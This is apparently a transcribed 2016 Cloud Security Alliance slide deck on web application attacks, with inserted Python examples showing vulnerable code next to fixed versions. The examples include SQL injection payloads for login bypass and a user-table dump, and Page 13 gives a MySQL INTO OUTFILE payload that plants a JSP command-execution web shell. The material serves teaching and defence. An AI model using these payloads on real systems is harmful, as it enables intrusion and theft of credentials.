andrew useckas csa presentation hacking custom webapps 4 3

Upload: trish-mcginity

Posted on 23-Jan-2017

Page 1

www.cloudsecurityalliance.org

Custom web applications as a way into your internal network
Andrew Useckas

Copyright © 2016 Cloud Security Alliance

Page 2

Introduction

• Securing custom web applications is more challenging than most people realize:

- Security is often overlooked during design and development

- As long as the site is indexed by at least one search engine, it is exposed to hacks, attacks, and full-blown assaults from anywhere in the world

- There is big money in hacking, and web applications are seen as an easy target that can serve as a jumping-off point into the internal network or a private customer cloud

- There is no vendor "security patch" for a custom web app, unlike infrastructure: every fix is your own development work

• It’s simply not as difficult to compromise a web application as most people think

- You don’t have to be a hacking wiz to exploit most badly written apps – there are plenty of tools out there to help you do it

Page 3

About Me

• CTO at Threat X working on a new approach to Web Application security.

• Over 15 years of experience in penetration testing / ethical hacking.

• Author and architect of multiple security sensors.

• Consulted for multiple enterprises on technical and compliance aspects of security.

Page 4

Agenda

• Basic overview of the hacker's mindset.

• Overview of the most popular current security measures.

• Web application attacks:

- Authentication
- Session management
- Access controls
- Client side checks
- Server side checks

Page 5

Who is the target?

• According to the Verizon 2016 DBIR report:

- 40% of confirmed breaches were web application attacks.
- 95% of confirmed web app breaches were financially motivated.
- Top industries attacked: Finance, Information, Retail.
- Higher percentage of confirmed data disclosure, as security measures are lacking.

• Botnets. Is my company too small to be attacked?

• My perimeter is secure: we run quarterly scans.

Page 6

The wild west of WebApps

• Security is often an afterthought. Time to market is more important than security.

• Developer education on safe coding techniques is lacking.

• A traditional Layer 3 firewall does nothing for web app security: the attack arrives on the port you deliberately opened.

• IDS / IPS systems do very little, as their signatures target network protocols and known products rather than the logic of a custom application.

• Modern TLS cipher suites use ephemeral key exchange (forward secrecy), so a passive sensor holding the server's private key can no longer decrypt the flows at the edge; inspection has to move to a terminating proxy or to the server itself.

• Piping all the logs to a SIEM tool may overwhelm the administrators.

• Most of these tools are useless in a cloud deployment model.

Page 7

Tools

• Browser: Firefox

• Intercepting proxy: Burp Suite

• SQLMap

• Target app: BodgeIt Store (originally hosted on Google Code)

Page 8

Authentication

• Login forms are often the first thing a hacker will try to break.

• Common issues:

- Weak or default passwords
- Default pages
- Guessable protected URIs
- Navigation tree leaks in JS
- Lack of proper server side sanitization

Page 9

Session Management

• Sessions are used to track users

• First line of defense

• Common attacks:

- Session hijacking
- Missing idle session timeouts
- Session riding (CSRF)
- Cookie manipulation
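As an added example (not code from the deck), the following Python shows a minimal server-side session store that addresses the four attacks listed above: unguessable IDs from the OS CSPRNG, idle and absolute timeouts, ID rotation after login, a per-session CSRF token compared in constant time, and cookie attributes that keep the ID away from script and cross-site requests. The timeout values, the `SessionStore` class and the cookie name are illustrative assumptions; the clock is injectable so the expiry logic can be exercised without waiting.

```python
# Added example, not from the CSA deck: a session store covering hijacking,
# idle timeouts, CSRF and cookie handling. Names and limits are assumptions.
import hmac
import secrets
import time

IDLE_TIMEOUT = 15 * 60          # seconds of inactivity before the session dies
ABSOLUTE_TIMEOUT = 8 * 60 * 60  # hard cap on session lifetime, touched or not


class SessionStore:
    def __init__(self, clock=time.time):
        self._clock = clock   # injectable clock so expiry can be tested
        self._sessions = {}

    def create(self, user_id):
        # 256-bit random ID from the OS CSPRNG: nothing derivable from the user.
        sid = secrets.token_urlsafe(32)
        now = self._clock()
        self._sessions[sid] = {
            "user": user_id,
            "created": now,
            "last_seen": now,
            "csrf": secrets.token_urlsafe(32),  # per-session anti-CSRF token
        }
        return sid

    def lookup(self, sid):
        """Return the session dict, or None if unknown or expired."""
        s = self._sessions.get(sid)
        if s is None:
            return None
        now = self._clock()
        if (now - s["last_seen"] > IDLE_TIMEOUT
                or now - s["created"] > ABSOLUTE_TIMEOUT):
            self.destroy(sid)
            return None
        s["last_seen"] = now   # sliding idle window
        return s

    def rotate(self, sid):
        """Issue a fresh ID after login or privilege change (fixation defence)."""
        s = self._sessions.pop(sid, None)
        if s is None:
            return None
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = s
        return new_sid

    def destroy(self, sid):
        self._sessions.pop(sid, None)

    def check_csrf(self, sid, submitted):
        """True only if the form carried this session's own CSRF token."""
        s = self.lookup(sid)
        if s is None or submitted is None:
            return False
        return hmac.compare_digest(s["csrf"], submitted)


def set_cookie_header(sid):
    # HttpOnly keeps the ID away from injected JS, Secure keeps it off plaintext
    # HTTP, SameSite=Lax stops the browser attaching it to cross-site POSTs.
    return f"Set-Cookie: SESSIONID={sid}; HttpOnly; Secure; SameSite=Lax; Path=/"
```

Every request handler calls `lookup` once and treats `None` as "not logged in"; state-changing handlers also call `check_csrf` with the token from the form body, never from a cookie, since the cookie is exactly what a riding request already carries.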

Page 10

Access Controls

• Defective access controls are often exploited after the initial penetration.

• Hidden information in HTML

• Information leaks through JS

• Horizontal privilege escalation (reading or changing another user's data at the same privilege level)

• Vertical privilege escalation (reaching functions reserved for a higher role)
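As an added example (not code from the deck), the following Python puts the two escalation patterns side by side with their fixes. `get_order_vulnerable` trusts the order ID from the URL, so any logged-in customer who increments it reads someone else's order (horizontal); `delete_user_vulnerable` takes the caller's role from a hidden form field, the kind of "hidden information in HTML" the slide mentions, so anyone can edit the field and act as admin (vertical). The hardened versions decide ownership and role from server-side state only. The users, orders and function names are constructed for illustration.

```python
# Added example, not from the CSA deck: horizontal and vertical privilege
# escalation in an order system, vulnerable and fixed. Data is constructed.
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    id: int
    role: str   # "customer" or "admin", taken from the server-side session


class Forbidden(Exception):
    pass


# Constructed sample data: order_id -> (owner user id, description)
ORDERS = {
    1001: (1, "alice's order"),
    1002: (2, "bob's order"),
}


def get_order_vulnerable(order_id):
    # Horizontal escalation: the handler only checks that the order exists.
    # Alice changes ?order=1001 to ?order=1002 and reads Bob's order.
    return ORDERS[order_id][1]


def get_order(user, order_id):
    # Ownership check on every access, using the identity from the session.
    owner, description = ORDERS[order_id]
    if user.role != "admin" and owner != user.id:
        raise Forbidden(f"user {user.id} may not read order {order_id}")
    return description


def delete_user_vulnerable(form, target_id):
    # Vertical escalation: the role comes from <input type="hidden" name="role">
    # that the page emitted, so the client controls it via an intercepting proxy.
    if form.get("role") != "admin":
        raise Forbidden("admin role required")
    return f"deleted user {target_id}"


def delete_user(acting_user, target_id):
    # The role is read from the server-side session, never from the request.
    if acting_user.role != "admin":
        raise Forbidden("admin role required")
    return f"deleted user {target_id}"


def denied(fn, *args):
    """True if the call is refused by the access check."""
    try:
        fn(*args)
    except Forbidden:
        return True
    return False
```

The hidden-field pattern is worth grepping for in a code review: any authorisation decision that reads `role`, `is_admin`, `user_id` or a price from the request body is client-controlled and must be replaced by a lookup against the session.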

Page 11

Client Side Checks

• Validation of input fields before they are passed to the server

• Usually based on JS

• Easily bypassed: an intercepting proxy such as Burp Suite lets the attacker edit the request after the JS has run, or the request is simply replayed without the browser, so every check must be repeated on the server

Page 12

Server Side Checks

• The server side is usually talking to a database engine such as MySQL.

• User input can be passed to the backend scripts without proper validation, resulting in backend attacks such as SQL injection (SQLi).

• SQLi can be used to:

- Bypass authentication controls
- Bypass access controls
- Execute full database dumps
- Write script files to the remote file system; the scripts can then be executed from the browser, giving an attacker shell access to the remote system
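As an added example (not code from the deck or from BodgeIt), the following Python rebuilds a login form and a product search on SQLite so that the first three uses of SQLi on this slide, and the client-side-check bypass from the previous slide, can be run offline. The same string-built query appears in countless PHP and JSP apps; the client JS may strip quotes, but the payload arrives intact once the request is replayed through a proxy. Table names, credentials and payloads are constructed for illustration, and passwords are stored in clear only so the dump is readable. The `INTO OUTFILE` technique on the next slide is MySQL-specific and is not reproduced here.

```python
# Added example, not from the CSA deck: SQL injection against a login and a
# search handler, with the parameterised fix. Schema and data are constructed.
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT,
                           password TEXT, role TEXT);
        INSERT INTO users VALUES (1, 'admin', 'Winter2016!', 'admin');
        INSERT INTO users VALUES (2, 'alice', 'hunter2', 'customer');
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO products VALUES (1, 'widget'), (2, 'gadget');
    """)
    return db


def login_vulnerable(db, username, password):
    # The query is assembled by string formatting, so a username of
    # admin' --  closes the string and comments out the password check.
    sql = (f"SELECT name, role FROM users "
           f"WHERE name = '{username}' AND password = '{password}'")
    return db.execute(sql).fetchone()


def login_safe(db, username, password):
    # Bound parameters: the driver sends the values separately from the
    # statement, so quotes and comment markers are just characters.
    sql = "SELECT name, role FROM users WHERE name = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()


def search_vulnerable(db, term):
    # A UNION appended to the search term turns a product listing into a
    # full dump of the users table (the "full database dump" from the slide).
    sql = f"SELECT name FROM products WHERE name LIKE '%{term}%'"
    return [row[0] for row in db.execute(sql)]


def search_safe(db, term):
    sql = "SELECT name FROM products WHERE name LIKE ?"
    return [row[0] for row in db.execute(sql, (f"%{term}%",))]


# Payloads as they would leave Burp Suite after editing the intercepted request.
AUTH_BYPASS_USER = "admin' --"
DUMP_USERS_TERM = "' UNION SELECT name || ':' || password FROM users --"
```

Both fixes are the same change: never concatenate user input into SQL, bind it. That is also the property a code reviewer can check mechanically, since every `execute()` call with an f-string, `+` or `%` in its first argument is a finding regardless of what the client-side JS filters.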

Page 13

Further Exploits

• It is possible to write server side scripts to disk through backends such as MySQL. For the MySQL case this needs the application's database account to hold the FILE privilege, a secure_file_priv setting that does not block the target directory, and a web root that the mysqld process can write to, which in practice means the database and the web server share a host or a writable mount.

• The script can then be executed from the browser, giving shell access.

• Sample injection (the JSP runs the command but does not return its output; it is the minimal form):

UNION SELECT '<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>',null INTO OUTFILE '/some/webdir/dir/cmd.jsp'

Page 14

Parting Recommendations

• Secure development and QA

• Next-generation Web Application Firewall

• Pen testing

Page 15

References

• Verizon Data Breach Investigations Report (DBIR): http://www.verizonenterprise.com/verizon-insights-lab/dbir/